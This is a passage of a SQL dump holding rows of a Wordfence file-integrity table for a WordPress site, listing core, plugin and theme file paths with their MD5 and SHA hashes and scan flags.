(0xf83bc7254e21399d0a4c264e84dee79e, 'wp-content/plugins/wordfence/views/onboarding/modal-final-attempt.php', 1, 0x00000000000000000000000000000000, 0xc1df0579b3dcc1f075f54a01c9b667b4, 0xfe05936c1c33e3b0fa87c3840a6377c3787e654c1011ee68501ad5db92d7fd39, '', 0, '?'),
(0xf840a8d2ea7342303c807b6cb6339fd1, 'wp-includes/wlwmanifest.xml', 1, 0x00000000000000000000000000000000, 0xdfd490b6f383ea02a269031ff05e8896, 0xd5c6a44ac4be2a2a587c69bba0cf63792d877f75361670e8c0432de6242a0abc, '', 0, '?'),
(0xf8443d9fcbf7870e8ae80bd653badb43, 'wp-includes/sodium_compat/src/Core/Curve25519/Ge/Cached.php', 1, 0x00000000000000000000000000000000, 0xf925f45890a4f6b08195d060d0b94b5a, 0x53b557a0f02caae8b466a4c3d74b7baeff5c99d0fed5d8e08ef21bd75e592fa8, '', 0, '?'),
(0xf84ab8b3a9486c1d35b9e8d6a98dd350, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-basic-grid.php', 0, 0x822f6ba1ec7f0bd0b6a24e0842bde33a, 0x822f6ba1ec7f0bd0b6a24e0842bde33a, 0x9668f593ad3f202d0b535353ed8f94f36d93b93455198499ad19be7bffefae8b, '', 0, '?'),
(0xf855d871c647e748db581f9875f327b6, 'wp-content/plugins/wordfence/js/admin.1579191227.js', 1, 0x00000000000000000000000000000000, 0x6bf5864022697acd41c429f0f3dc98fb, 0x735650a280496557b6c0fc18f555b9845f79c2d193565ac7cc76ce78b40a00ab, '', 0, '?'),
(0xf862ad7b8bf2afd139d7a3fe47326a68, 'wp-content/plugins/wordfence/css/jquery-ui.theme.min.1579191227.css', 1, 0x00000000000000000000000000000000, 0x0462924bbf308e0f62f6ba78d199155d, 0x34c3f5fdf9c70a96081063b545323d56937bc62be85c676f1f12d0859d4f87a4, '', 0, '?'),
(0xf86b9314796309619d0af817d838ea59, 'wp-content/plugins/Ultimate_VC_Addons/admin/vc_extend/js/ultimate-image_single.js', 0, 0x204532bf086f8b71ad0ffa07336fecd3, 0x204532bf086f8b71ad0ffa07336fecd3, 0x8028fd09c61d44a6671fd554f8e371b09e5cbd633131d3351a3401d227357e6f, '', 0, '?'),
(0xf86be67f1401de12ba94653c46eada34, 'wp-admin/js/revisions.min.js', 1, 0x00000000000000000000000000000000, 0xd1587acf93ef6d0fc64758d984f50d56, 0x3a8a982b894d5a3467c9accc7e7132a752920b4ba32544bafe21bf06eb359fbf, '', 0, '?'),
(0xf8791f27ec931b70417874255c22407f, 'wp-content/plugins/Ultimate_VC_Addons/assets/js/video-banner.js', 0, 0xc55fbf996c054ee6d7b433b7056a0d9e, 0xc55fbf996c054ee6d7b433b7056a0d9e, 0x55b75284b68e652aee87f6a7948e5e557576ffb1a7b330106a3e5a62e9a69a4c, '', 0, '?'),
(0xf889885fd1d4a246249ca7a60dba0e90, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_important_devices_24px.svg', 0, 0x3db223ac5ce721e1a53e3b18fd68cbbd, 0x3db223ac5ce721e1a53e3b18fd68cbbd, 0xc2d712797569a3ec7010c483593851ea7d6fa97b96afa4a6176cfe1fd91774fd, '', 0, '?'),
(0xf88ba21344dacd3d4bf434399c0392d0, 'wp-includes/js/codemirror/codemirror.min.css', 1, 0x00000000000000000000000000000000, 0xa632336ab79ded318dc02844c4faf3b5, 0xe107b9ce8ce12c61c2c075e4edc040ba73f159254bfd96cb102d6fbcc76e0da6, '', 0, '?'),
(0xf89cdb5e29872b5285dce5c91e501c92, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/modules/shortcode_list.php', 0, 0x0e4842715334748f840e00a9b541d282, 0x0e4842715334748f840e00a9b541d282, 0x853568f4451cd945a768f6807fe9d17bcedac5fa8587513c1817c9b82c8542e0, '', 0, '?'),
(0xf89f65edb0487699e14903863482032e, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_explicit_24px.svg', 0, 0xaf798e4fca417183517d22d2acb1ed32, 0xaf798e4fca417183517d22d2acb1ed32, 0x218b49f41147e32deba269036063aca0c3df627bf3666bb1f154cc912301b9c3, '', 0, '?'),
(0xf8a6af018f16a0fadf434d703c4581e6, 'wp-includes/class-wp-oembed.php', 1, 0x00000000000000000000000000000000, 0x6482c87ad060318b99f3c28892420d1e, 0x934cf1cd0d3a83f060e5a3a4895fedbc77f53cbdbd13d98d7fbf581f0f633ab1, '', 0, '?'),
(0xf8be8ede10be6894dd20f16b457edd1a, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_comment_24px.svg', 0, 0xeb56841b116108f9515e244947caad11, 0xeb56841b116108f9515e244947caad11, 0xada067830e3b08921a53de9075ae89b88f449d2f103d7abc9fddfc4f7c971947, '', 0, '?'),
(0xf8c2364b31fdfe9b28eef6dd7d2f4158, 'wp-admin/network/user-new.php', 1, 0x00000000000000000000000000000000, 0x608d0fa59383eae1d4c7be59ccfb6993, 0x8a108c120ce9967066880f95ec999d2c31505ec0efe959f754d02f416f2aaae8, '', 0, '?'),
(0xf8c23cd19bec621aa4d59bc4b300430e, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_drag_handle_24px.svg', 0, 0x38efde2f994a55b412f6a47e2ece5b73, 0x38efde2f994a55b412f6a47e2ece5b73, 0xe7cd158dae97c4443a5597976c304dfe96eca1f2e7bfbfb80cde8ae86fe1ff8f, '', 0, '?'),
(0xf8e8e264b61defd7b82ebda52c5166bf, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_brightness_6_24px.svg', 0, 0x54423079d379a0b2d1484cca2759f77b, 0x54423079d379a0b2d1484cca2759f77b, 0xf095b785619be3720ed0d3e2faf1392e15ba260f25c4002b3efaaafca99ce1e1, '', 0, '?'),
(0xf8f49d9fc4a9cf7d78ec99285417bd9c, 'wp-includes/js/dist/block-library.js', 1, 0x00000000000000000000000000000000, 0x5786c85790791cef4476254b70a3e310, 0x235d6120dab3d93278b612d93a002664f7468d384716a7ae2128b3713b626d67, '', 0, '?'),
(0xf9115e51366c84cf4a21a00409e2cda6, 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/json.php', 1, 0x00000000000000000000000000000000, 0x9b8d8e9bc3f86423fb9dcb6bd5e2fb9b, 0xa6171ee77406777dfa9e3f01658e09ca6842a1a4543932c87543f8c29e7637e4, '', 0, '?'),
(0xf91ba0c31ce00022b78a3d2aa54c1bdd, 'wp-content/plugins/revslider/admin/views/templates/create-slider.php', 0, 0x3ccd4083d279d4b0cbdfb42aa5cfa41d, 0x3ccd4083d279d4b0cbdfb42aa5cfa41d, 0xaa602231216e0bce1e91d2dc5d36f8e0006a7ea2d49de19950ace0bd85156abe, '', 0, '?'),
(0xf920c584319a727d6d4a4757df52a8d9, 'wp-content/plugins/wordfence/views/scanner/options-group-performance.php', 1, 0x00000000000000000000000000000000, 0xd6694c78d08aa7f1907306f266d4e6c7, 0x8064dd61e731863668087293f1873736be805b29d58bcbd24f17a84de7bd927a, '', 0, '?'),
(0xf9376c6a4c0abe87903862b49b9e7de9, 'wp-content/plugins/js_composer/include/helpers/helpers_api.php', 0, 0xa7e395a896c9497b9507239e862e8c1b, 0xa7e395a896c9497b9507239e862e8c1b, 0x257c8939034c0c5b20f71dd7cfc945358667aeacc14d3bff6b8e5d3abe1f2027, '', 0, '?'),
(0xf93cfeefe96e66b96fa053d39d072e2a, 'wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-categories.php', 0, 0x2fd8bd95bd7f7f3e80b3811ecdd53225, 0x2fd8bd95bd7f7f3e80b3811ecdd53225, 0x9f7c625402edcc5effe3f753872c4fc3d42319614bd40efd2cc4ac762265b542, '', 0, '?'),
(0xf9412351d98a641f07af7886b134b816, 'wp-content/plugins/Ultimate_VC_Addons/assets/js/expandable-section.js', 0, 0x4bf7b610e1f65dc31f22d7f32434b9e8, 0x4bf7b610e1f65dc31f22d7f32434b9e8, 0x79674a90b2a5d0f9975f89920256a16b6078af1e0a4a20ee58bef9d635290b2c, '', 0, '?'),
(0xf95e3a6bca43eaeb8cccc592b7a5d85e, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_accessible_24px.svg', 0, 0xc375ff8e8a6bc9d6fcb076eb642b82c6, 0xc375ff8e8a6bc9d6fcb076eb642b82c6, 0x16d2beb6b1c81324503158d3b741a54d42df2eb2ac7b23b1743569c894077f58, '', 0, '?'),
(0xf965094fb627206b6db579d99c93db07, 'wp-content/plugins/js_composer/assets/lib/bower/ace-builds/src-min-noconflict/theme-chrome.js', 0, 0x8b1bfa5a1e7907c3e87c6b701142ed74, 0x8b1bfa5a1e7907c3e87c6b701142ed74, 0xa7f44e79b01812696616810b0fc95313667d8e9f24a5c8a11650ff19de7eaf99, '', 0, '?'),
(0xf984c9b1259bb9617b5abc6a090225bf, 'wp-includes/class-wp-editor.php', 1, 0x00000000000000000000000000000000, 0xff9ced825e7503534e37f68ff62cc003, 0x0536c028e96ecda3eebd9927b34bf1806d7287628c6fb28d44a91b6ac3b98c70, '', 0, '?'),
(0xf9868e6e50e203872ec7a0fc1941c29a, 'wp-content/themes/Impreza/framework/widgets/us_gallery.php', 0, 0x70f125faa832b5f4b0ec94b34fb4101a, 0x70f125faa832b5f4b0ec94b34fb4101a, 0x0ebbeeaa052a933ce68ee85624ddfb57c193c8d8cacd159121487167814f81d0, '', 0, '?'),
(0xf98786f31f49993a3450fa55d2d908c0, 'wp-includes/SimplePie/Cache/Memcache.php', 1, 0x00000000000000000000000000000000, 0xf69d4a55b2a1168531535107ab843fb6, 0xb904047f7d6bf1f69ffc08e4d24a1f3fe9b0f76441fa3c61ab4395a0a4333a5b, '', 0, '?');
INSERT INTO `zdenl_wffilemods` (`filenameMD5`, `filename`, `knownFile`, `oldMD5`, `newMD5`, `SHAC`, `stoppedOnSignature`, `stoppedOnPosition`, `isSafeFile`) VALUES
(0xf988f745ea57fe1214b830f9404c66b7, 'wp-content/plugins/Ultimate_VC_Addons/assets/js/hotspot-tooltipster.js', 0, 0x67df125f69b200cf474e6c1ef2d83c44, 0x67df125f69b200cf474e6c1ef2d83c44, 0x8e105c2e121b8f11bde2b61465bb983557857e018d71a3aaa5c0e686d90505dd, '', 0, '?'),
(0xf997384bb0e7200b3f4f0b5d12cab959, 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/rules.key', 1, 0x00000000000000000000000000000000, 0x10baa71a6c595e5b460dc83278cabb02, 0xcf363d9393d8539371ae2d352029b8ab45bf4c7d41a4566911415d9f1f9f8e0f, '', 0, '?'),
(0xf99a0303ced646875cd86ff45c0bb327, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-my-shortcode.svg', 0, 0x0fc50956a2b64d2a6dccbc1b8a6b4c6d, 0x0fc50956a2b64d2a6dccbc1b8a6b4c6d, 0x048af8bfef48b5ca50d42530444689b084ae2648b89eadcb873f96f099d398b3, '', 0, '?'),
(0xf99a0b5d32cb25079e9cea52ee9a4d58, 'wp-content/themes/Impreza/framework/vendor/usof/functions/meta-box.php', 0, 0xa2d59649a03507519af81d366d8f584a, 0xa2d59649a03507519af81d366d8f584a, 0xf2c237c0a0c9f57b52fbdc65d36b8a60195baabf2063b785946ed9149986e55d, '', 0, '?'),
(0xf9a28db870f66c345bb2feb0659bdbfb, 'wp-admin/js/inline-edit-tax.min.js', 1, 0x00000000000000000000000000000000, 0x6df2176e4c845dae0a4798bfbe503380, 0xd5e67391f99af0949ea7a59c21201fb496ae0b23f71fcb6ecf7db43789816598, '', 0, '?'),
(0xf9b22bbe3b42fc125e267c72b0b02008, 'wp-content/themes/Impreza/archive.php', 0, 0x1a6e318275ac757dc444b3eb51e82eec, 0x1a6e318275ac757dc444b3eb51e82eec, 0xcc268defe8de759191b76d9dbc0830ddaa5a76e4dc8256730727846841fc5e33, '', 0, '?'),
(0xf9c29a307846fd1532d509603a4fc379, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-column-inner.php', 0, 0xae26daabede66e22b451f85a202a8fab, 0xae26daabede66e22b451f85a202a8fab, 0xe4719ef58f64bca1ac6495a0b7582d875e6abba5dc5bcc0fc0ada02c0b7afb2b, '', 0, '?'),
(0xf9c9bf6a834b09b31eea0f321dbf83c5, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-icon.php', 0, 0x6753c9e05d2b797181a5bd7106b40d23, 0x6753c9e05d2b797181a5bd7106b40d23, 0xc17b65ec46ef6e1b52aed3097569eb1ae6bce69f0ec6cb9d2b5d99dcbde6e1a6, '', 0, '?'),
(0xf9d1ff9af4dfd08d33f83e23bc2efb12, 'wp-includes/rest-api/class-wp-rest-request.php', 1, 0x00000000000000000000000000000000, 0xf0507f57d54e3c5d61cc7af2fe79e9a2, 0x73d714cd2d7dae9ec647fbfbcfb56c3372f5bbca8495e1bf82694e67ad78703f, '', 0, '?'),
(0xf9dd5e7938993710c50b7a5f6652c5a0, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_archive_24px.svg', 0, 0x245df53b2d3768bcb4029db7f5e170b3, 0x245df53b2d3768bcb4029db7f5e170b3, 0xd2e7b19a00d1dbc954928495858c8779f051584918b192933805f40ad48aebf6, '', 0, '?'),
(0xf9ed507312e95ed1eeb0636adc311743, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/modules/shortcode_cat_grid.php', 0, 0xae45ad5897f7a04eaf1b0d7afb3eb3ba, 0xae45ad5897f7a04eaf1b0d7afb3eb3ba, 0xe7b0f23d0c2cd562115713c5f452c9fe826f2c6bb501c07e54e83e9eb576c200, '', 0, '?'),
(0xfa01529cde3dfadd2ac964f2d56e0390, 'wp-admin/includes/media.php', 1, 0x00000000000000000000000000000000, 0x150f95c4ffb89ea6165a3bc19d60dccc, 0x850f30c7bd2591eeaf8479cb7f66ab40989677cb6f521fa1aae058b55f46b771, '', 0, '?'),
(0xfa1c86388dee3d119aba91c75bd5b183, 'wp-content/plugins/wordfence/modules/login-security/views/page/manage.php', 1, 0x00000000000000000000000000000000, 0xba857ef45047242132b9d8ff28739a60, 0x18d7a407e49ac73a02a979db52854ae088606c7c42fc48778e9037351eb6211d, '', 0, '?'),
(0xfa1db61c411e8c8bcdcb29cdb94434cd, 'wp-includes/pomo/plural-forms.php', 1, 0x00000000000000000000000000000000, 0x6a9b165a54680d7519f758e7e7262c0f, 0x1e95412932076712ddf49cb7af772ae740dae6b3b1f60b4870b1be762dff2f46, '', 0, '?'),
(0xfa2c8e59d41076288f74f87932922f8d, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/calendar1.svg', 0, 0x7856d0871153823888064aa7aedee1df, 0x7856d0871153823888064aa7aedee1df, 0x2b281af7fc7829755dba7d87a8836a91ec8d7db4ead1e4e1aca16a425fae3d3b, '', 0, '?'),
(0xfa2d5e67ff88ccba4000072ff7119386, 'wp-content/index.php', 1, 0x00000000000000000000000000000000, 0x67442c5615eba73d105c0715c6620850, 0x6b8d898dc0977e09b6bd55481aa5d678831850eadb41cc84a2fa3ca19e3b58a8, '', 0, '?'),
(0xfa2ed5b6bbd5f15a67027bda3df19acc, 'wp-admin/css/customize-controls.min.css', 1, 0x00000000000000000000000000000000, 0x56845933fa75808c849409235ad4766f, 0x47aea8a1653cc215560de015e41e53a638095974c37b977c54282ddb60b0cc1b, '', 0, '?'),
(0xfa31438bdcd1ed76b58e803a90f8b935, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_brightness_high_24px.svg', 0, 0xe9d57ab7f0b9d8510e44889e09cb9973, 0xe9d57ab7f0b9d8510e44889e09cb9973, 0x10842651180e4b18fd76ebe31e254ec1008c8c9f167596a04993ce1576ad59d9, '', 0, '?'),
(0xfa3d936f6c2cd266e7380f8af2a80553, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_gas_station_24px.svg', 0, 0x5f3cdd8a600cf3bddab261027d6deb8f, 0x5f3cdd8a600cf3bddab261027d6deb8f, 0x28ba74d9d3771f3887464416f6f48809abb867fc6a24fd1b063e00a1a3f74adc, '', 0, '?'),
(0xfa3dca794526a00d71484c500691226a, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/content/vc_column_text.js', 0, 0x582d23061d41233f4ac660f5b5201caa, 0x582d23061d41233f4ac660f5b5201caa, 0x46513cea4a01b6e8826023760177ee0dfafb9ba5d46156719f87e657943533d6, '', 0, '?'),
(0xfa7709a59a8d2bbb026a0ceca402fbc0, 'wp-content/plugins/wordfence/views/common/status-circular.php', 1, 0x00000000000000000000000000000000, 0xf0e219df7fba2919df2e1e3da3b7a567, 0x71345e222dfa3986e687e1ed0a0e6419310271ac918810e84f2cedf98f1c18c7, '', 0, '?'),
(0xfa7c5f0ee5bf5d3233923c3eba3ceea8, 'wp-content/plugins/revslider/public/assets/assets/svg/places/ic_kitchen_24px.svg', 0, 0xb16e495cc446b017c6420ce626a06846, 0xb16e495cc446b017c6420ce626a06846, 0xe89a22fe869a9a0c14573d1f7924beee34a8b21d7784d64d400e85dc54b23e9c, '', 0, '?'),
(0xfa85ba9562a44ac8a8f8eb16c6431c4b, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-structure04.svg', 0, 0x78f73e38abeb730b66abd0f3e6a6267d, 0x78f73e38abeb730b66abd0f3e6a6267d, 0x7e4ab57c359df1e8eb86d306cb694b3d6048ebb6884713d93c93f5a2f25a66e9, '', 0, '?'),
(0xfa8837da9421f532a6782592584efa33, 'wp-content/plugins/wordfence/views/options/option-token.php', 1, 0x00000000000000000000000000000000, 0xd957e55937db166f09fb5fdcd380d93f, 0x188ea62041c9514e651a7977977347a18c40b8f9ab165a49267f4ca2efe110a1, '', 0, '?'),
(0xfa8aad7e858b0c610f25a1eb211ebb50, 'wp-includes/js/tinymce/skins/wordpress/images/pagebreak-2x.png', 1, 0x00000000000000000000000000000000, 0x7bce36bf2355513af7917c193e23ebd6, 0xd228ddee5b0ad713ccbbe2896f9f52416f9133a4bc5e05e608a1c60cfd190804, '', 0, '?'),
(0xfa9894e7d94c1d3f40a79a2e127e4faf, 'wp-admin/css/colors/midnight/colors-rtl.css', 1, 0x00000000000000000000000000000000, 0xe12dc487d41f9eb74752df4e280e69f2, 0xaf383e7c845da6d8b59558fe4ca931fa32ba40cbae690a0127187e84f2e8366e, '', 0, '?'),
(0xfab3acbb540a199a88f4ad652e28bcb1, 'wp-includes/class-wp-image-editor.php', 1, 0x00000000000000000000000000000000, 0xb3b91d4f419027bbe1abec2e1449a8d7, 0x38ae54274e4edf72bbafb0639c6a65c43259c67f05e909043dbae2dfdc7fc91f, '', 0, '?'),
(0xfac03e3cd6517a5530dadc56a2a45fd3, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_pan_tool_24px.svg', 0, 0xd8c6dd889eef74419d87a55c0b5a25e6, 0xd8c6dd889eef74419d87a55c0b5a25e6, 0x382e9b0688d52d9fffd4d93a7d9bfe6d2d9eb0b4fd39ba4b24a5331d2e7d68c9, '', 0, '?'),
(0xfae05a967025276e1a91aa576ab51be5, 'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_real.php', 1, 0x00000000000000000000000000000000, 0xecc89afd9a8f29573093cb06080a4deb, 0x3bf6a333855506e09fef627d568fbb206bd82759ca728bfa0a9e728848a12936, '', 0, '?'),
(0xfae2907d87dbe1b350c39b99505ca91a, 'wp-includes/js/tinymce/plugins/wpautoresize/plugin.min.js', 1, 0x00000000000000000000000000000000, 0xb88b9554a163ab6eabae776b24d0d2b9, 0xfb9396a0162cba0f401af247e689864d57da054554bf2d04babdb88dd4fc9f81, '', 0, '?'),
(0xfae46f141d84c561f8e666937d0c3f45, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_expand_more_36px.svg', 0, 0xdc9f0f741f1dfcf9d20cbecf69f56f18, 0xdc9f0f741f1dfcf9d20cbecf69f56f18, 0x28c247c1f152ea8aa2bbfacfdff86a523b631a551b7fcac644d876d4638192cc, '', 0, '?'),
(0xfae8528a2c9e41a7c0fd1af1474a272d, 'wp-includes/default-filters.php', 1, 0x00000000000000000000000000000000, 0x87fee2e4f8eab07f6d6fb04d1d3c4cf3, 0xf2da924337024020116418446a109212af0c00503968782c84dfb0acf1006a08, '', 0, '?'),
(0xfae9925b4b1419fdc20181bb22c4c67a, 'wp-content/plugins/js_composer/config/structure/shortcode-vc-raw-js.php', 0, 0x148edec6b9cf8d14411d5a35a95df871, 0x148edec6b9cf8d14411d5a35a95df871, 0x25f0a7e4e95abf31af3aac244940384dca8864bc51acf37fdc79c289aace2063, '', 0, '?'),
(0xfafdca0a5cd4fbc9b62e35fa108e9a19, 'wp-includes/images/xit.gif', 1, 0x00000000000000000000000000000000, 0x94ecab09335897c4ab392bef96366e7e, 0xfcd6fc2073b2afb994c9dbdba80c93a0532c6d64ef9f5c59146292c687efc26f, '', 0, '?'),
(0xfb0580b6d0ace7709a491604d2c65952, 'wp-includes/sodium_compat/src/Core32/BLAKE2b.php', 1, 0x00000000000000000000000000000000, 0xc97af5f0cbf5ddc4a73780099f37561a, 0xb0709591e5122334ae6fdb70e67038dc5ed9dbb0d35ece46f22b81d7a3a0296c, '', 0, '?'),
(0xfb2157e38e83cf54e7e0006140a3ec6f, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_row_inner.php', 0, 0xc2439fba9df52f72259dd69ea5f1368b, 0xc2439fba9df52f72259dd69ea5f1368b, 0xf2bc269e3be40701fe4318cf12f4e5497c7500dd08460a60bbf46643a9cfb106, '', 0, '?'),
(0xfb28d08abb514226a6808cf6513fe99f, 'wp-includes/blocks/categories.php', 1, 0x00000000000000000000000000000000, 0x43a2202a3d2fcc4ab3333a137d7ae179, 0xb2e85bb2f0c8ee609f4721e4d23dcfff6174960d412914292932d4c589a43b8e, '', 0, '?'),
(0xfb4481cf10e1ea5de69f7cdfbcaa2499, 'wp-includes/js/mediaelement/wp-mediaelement.js', 1, 0x00000000000000000000000000000000, 0x03bd5bce1479cfa83e955c1392efb02e, 0x61163c2d7aca0e6a681ca5bd28b4d8a93271e9d94a8748a1c297658704d9c992, '', 0, '?'),
(0xfb491ad125f49eb3f886784b257b6b31, 'wp-content/plugins/js_composer/js_composer.php', 0, 0xd1a298ac8c297e92059c3849d2132fe9, 0xd1a298ac8c297e92059c3849d2132fe9, 0x1018cbd2282b760acf4aadd81f9cd5701d6e8b1a4608373e07d0927b002a62bb, '', 0, '?'),
(0xfb5068dcc81f077f1eb3b7a4117256e2, 'wp-admin/css/revisions-rtl.css', 1, 0x00000000000000000000000000000000, 0x14180fbee1fff1db3412989150c0443b, 0xbddbca986ce6ea30e85bfe82ebd680769b6b040706843ab39d5b0c57d2194223, '', 0, '?'),
(0xfb532a5234418a175832d058b63d0d69, 'wp-content/themes/Impreza/framework/shortcodes/vc_tta_tabs.php', 0, 0xa569016c25e64fa454484354ea8d1ebb, 0xa569016c25e64fa454484354ea8d1ebb, 0x00717616893861e8a08e29cd6980f51fa679ddb07305352aca0a31baa60ed196, '', 0, '?'),
(0xfb8a681adfc7f5605e566b21cafab51a, 'wp-content/themes/Impreza/framework/shortcodes/us_single_image.php', 0, 0xa263f92fd137e36c446927ba17f4a99d, 0xa263f92fd137e36c446927ba17f4a99d, 0xe8ce3e68ea99b95b011d698c300d4b97b263f8eae8cd033b87f10ec5a949bbc8, '', 0, '?'),
(0xfb8be7ab39358a9fb1a035f1896d41c6, 'wp-content/themes/Impreza/config/header.css.php', 0, 0x49392afbb6e1e22ba0f66a0ae91e96ed, 0x49392afbb6e1e22ba0f66a0ae91e96ed, 0x54e9a34e8f20594db2ab81a12cfee5c54b78adb9a1d792ea7fb8b834853a3fdb, '', 0, '?'),
(0xfb9ad156d9d39297d84712382e92f56d, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_swap_calls_24px.svg', 0, 0xf76be2f90dbd26964a99d01967a419a6, 0xf76be2f90dbd26964a99d01967a419a6, 0x0b3fca135480c3160c52348e6bed501893458b65c2984d821dc96c5b4179f2a9, '', 0, '?'),
(0xfbc1325d26d6942393f1d85e46d9718c, 'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/PermissionRequiredException.php', 1, 0x00000000000000000000000000000000, 0xf832cea2f10902ae2ffa4521e13c73d1, 0x5cd03d01a9abf4351797a9330b09aecf8e76cce1845f0125f132bdff41b63f24, '', 0, '?'),
(0xfbccc3f63652692a358ef0c1c414c3a6, 'wp-content/plugins/wordfence/lib/dbview.php', 1, 0x00000000000000000000000000000000, 0x8fc68da4f1ddb53111ade88b996e7a6b, 0x8b44eac04f68944201f03b34aa55a616376f2f67acf63869bac00cc0d92bccb7, '', 0, '?'),
(0xfbd1f7eb53e34b357fc13437cac19353, 'wp-includes/css/dist/block-library/style-rtl.css', 1, 0x00000000000000000000000000000000, 0x6cf938315537e537a7b83f86d09083ff, 0xb774f6b43515aec39163af55aa4acffae6191c3c1f664b3cb8882e44849ced71, '', 0, '?'),
(0xfbf0888dcf8158806e050df7e63f83c8, 'wp-includes/sodium_compat/src/Core/XSalsa20.php', 1, 0x00000000000000000000000000000000, 0x70f7a6c6aeb975af847f026f373b7e7a, 0x99a5afdac820256cf279bd278f23045b89f61f805ff27b451315bd5d388d25dc, '', 0, '?'),
(0xfbf9e50f7f3ce4bd3c387da035e225be, 'wp-content/plugins/Ultimate_VC_Addons/assets/min-css/fonts/ult-silk.svg', 0, 0xa97e1ea5aae192fa798ea0ad0e9557dc, 0xa97e1ea5aae192fa798ea0ad0e9557dc, 0x683a2e3fa30162be11713ed3abe3f390f6d617814c765a4092bc59b9234841a5, '', 0, '?'),
(0xfc112a3eaa27aa624458813f9161592a, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_class_24px.svg', 0, 0x01133baa9e4359b5f33b8d680307f950, 0x01133baa9e4359b5f33b8d680307f950, 0xb28798fc1ac87132379d8d3a9cf36b810593bd7ea86308154c3a1d846d8bf413, '', 0, '?'),
(0xfc1d5d29e9e909b983f37b973f527d1b, 'wp-includes/feed-rss.php', 1, 0x00000000000000000000000000000000, 0xe16426757954106eb8613a69cd288960, 0x90666c925019bbdf663589327f741e59338b187802cb1cff01f544c0d1d784cc, '', 0, '?'),
(0xfc2ea3cbdae0fca8eb5d578733f9e25f, 'wp-content/themes/Impreza/framework/vendor/usof/templates/fields/css.php', 0, 0x94649d517b7d4fe15d3b274d3b71f079, 0x94649d517b7d4fe15d3b274d3b71f079, 0x469d0158fa76308e690c05227176871888ae1969b9ae1bdd1f847935ab9e1ba8, '', 0, '?'),
(0xfc303c5073c9f1d79e480f97d1c13232, 'wp-includes/js/jquery/jquery.table-hotkeys.js', 1, 0x00000000000000000000000000000000, 0xa706ead694231e74fd6750b1670580a5, 0x3a91ce150f4196e618f166ae1578d7820814babae5f3b2dccbeaaded64833723, '', 0, '?'),
(0xfc3559921404040a2b2fe9395cce9368, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_shipping_24px.svg', 0, 0x5b2833894b50f1b5b475407a70419bbd, 0x5b2833894b50f1b5b475407a70419bbd, 0xca64007088905137459e7bebce28489325f11667bf0192382739320f8713de2a, '', 0, '?'),
(0xfc3928468c526a7f32b96e05365d818a, 'wp-admin/css/colors/light/colors.min.css', 1, 0x00000000000000000000000000000000, 0x67759de92dd9a5b53387ecf2ff9823dc, 0x1707d874bbc9f77b758aa2008c2bb1c851630d1913c943e36588870f414ad50f, '', 0, '?'),
(0xfc42ce46011501615ed341fb22848af4, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_sd_card_24px.svg', 0, 0xf2af241412f14eac6fd749d867d542fa, 0xf2af241412f14eac6fd749d867d542fa, 0xea67c46c08cefda5f8f2beea9a2084ec37a849a4dbd581e9e3e0c419413d12a1, '', 0, '?'),
(0xfc4a92a7f3122132a0a8dc00ad80c1fc, 'wp-admin/css/about.min.css', 1, 0x00000000000000000000000000000000, 0xbbf6106da26fcee52129ee9fc94c1274, 0x7472e3abb0377a7639ca552c89482da562a3267ed073a7abfd215c30b2bd69d8, '', 0, '?'),
(0xfc51be9cb494651f59f7b610b41f34ec, 'wp-content/themes/Impreza/framework/js/jquery.magnific-popup.js', 0, 0xb37d7edf99565d3858eaa1ad80df3cff, 0xb37d7edf99565d3858eaa1ad80df3cff, 0x6d53245e12a27c54d23813cec4919ab192df3dc5d8b8eb6c91dc46e7e9607089, '', 0, '?'),
(0xfc5ef94f817c273a51c799451ce7ddf0, 'wp-content/plugins/wordfence/views/common/status-critical.php', 1, 0x00000000000000000000000000000000, 0x51935bf55b5f595bca9b1cdceb4a7b26, 0x6ea24982821aab94675b1cc1ff00be114dcfc9020fc5cbe35a05e031ba5df3d5, '', 0, '?'),
(0xfc678d229a107d5fbf37b8bda6dc4a35, 'wp-includes/js/jcrop/jquery.Jcrop.min.css', 1, 0x00000000000000000000000000000000, 0x56cc9ea201dc2f4b910e78bfacac9211, 0x0fdd32ac539f5bb13644768935627316f4d93d8bd3c74e4ca57705f5be0f91b7, '', 0, '?'),
(0xfc6b0ca48a40f201c766aafaa5cf7840, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/piggy-bank.svg', 0, 0x42e7c2e8b3b4bb06194f43e90d378b75, 0x42e7c2e8b3b4bb06194f43e90d378b75, 0x748772a38141a511ac3c83482ead38ef09772cb32b9efe35e2c301fbfc7dce9d, '', 0, '?'),
(0xfc76365afe27f54ff1494c22dd954dd6, 'wp-includes/js/dist/block-editor.min.js', 1, 0x00000000000000000000000000000000, 0x0809e04dcb482d3d58d6ed4583a91317, 0xc75d1528370fa4b364bdb786c73040926975f0b4268970f3033e284dff8dc64d, '', 0, '?'),
